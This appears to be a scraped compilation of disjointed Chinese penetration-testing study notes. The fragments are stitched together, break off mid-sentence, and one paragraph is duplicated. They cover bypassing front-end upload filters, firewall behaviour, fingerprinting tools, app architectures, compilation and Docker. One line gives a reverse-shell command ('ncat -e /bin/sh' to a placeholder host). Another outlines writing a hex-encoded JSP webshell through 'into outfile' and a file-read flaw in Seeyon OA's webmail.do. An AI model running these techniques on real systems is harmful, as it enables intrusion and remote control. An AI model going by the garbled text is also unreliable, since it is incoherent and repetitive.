架构：html js login.html - logincheck.php。架构：html js php - upload.php。前端JS进行后缀过滤，后端PHP进行上传处理。后端PHP进行帐号判断，前端JS进行登录处理。2、禁用JS或删除过滤代码绕过。1、过滤代码能看到分析绕过。3、JS对上传格式判断。4、后端对上传数据处理。2、jQuery库教程。2、JS获取提交数据。2、配置Ajax请求

ping命令走的ICMP协议，而防火墙禁用端口是控制TCP/UDP协议，也就是控制传输层，ncat -e /bin/sh x.x.x.x 5566 linux反弹windows上。NC(ncat)瑞士军刀：linux系统下自带，windows下需要下载。为什么开启防火墙后 whoami数据还是可以带外回显？ping命令走的ICMP协议，而防火墙禁用端口是控制TCP/UDP协议，也就是控制传输层，但

Fingerprintjs2：基于JavaScript的指纹识别工具，可以识别浏览器的User-Agent、语言、时区、屏幕分辨率、字体等信息。BuiltWith：基于网站的指纹识别工具，可以识别网站所使用的Web框架、CMS、中间件、CDN等信息。stars:1000…forks:1000…user:test in:name test#组合搜索,用户名test的标题含有test的。WhatWeb

Web App一般非常小，内容都是app内的网页展示，受制于网页技术本身，可实现功能少，而且每次打开，几乎所有的内容都需要重新加载，所以反应速度慢，内容加载过多就容易卡死，用户体验差，而且app内的交互设计等非常有效。flutter是近年来谷歌推出的一款UI框架，使用dart语言进行开发，支持跨平台，weight渲染直接操作硬件层，体验可媲美原生。使用H5开发的好处有很多，可多端复用，比如浏览器端

通过信息收集，查出web根目录D:/UFseeyon/OA/tomcat/webapps/yyoa，通过 into outfile 写入文件，这里因为 jsp木马存在特殊符号，使用 hex编码 上传允许文件上传的jsp文件。致远OA webmail.do文件读取漏洞，由于/seeyon/webmail.do 页面 filePath 参数过滤不严，导致可以读取系统敏感文件。致远OA A6 test.

编译就是把源代码变成目标代码的过程如果源代码在操作系统上运行：目标代码就是“汇编代码”。再通过汇编和链接的过程形成可执行文件，然后通过加载器加载到操作系统执行。如果源代码在虚拟机(解释器)上运行：目标代码就是“解释器可以理解的中间形式的代码”，比如字节码(中间代码)IR、AST语法树。

编译就是把源代码变成目标代码的过程如果源代码在操作系统上运行：目标代码就是“汇编代码”。再通过汇编和链接的过程形成可执行文件，然后通过加载器加载到操作系统执行。如果源代码在虚拟机(解释器)上运行：目标代码就是“解释器可以理解的中间形式的代码”，比如字节码(中间代码)IR、AST语法树。

Docker 主要解决环境配置问题，它是一种虚拟化技术，对进程进行隔离，被隔离的进程独立于宿主操作系统和其它隔离的进程。，数据库用的是内网网络；这样的操作模式更快，更安全；为了安全性，可以在数据库方进行IP白名单限制等操作，也可以使用云数据库服务。思考：为什么有些页面打开是下载文件，有些页面打开是直接浏览？这里填写其他数据库主机(需开启外联)，进行站库分离。网站源码与路径不对应，根据路由的配置决定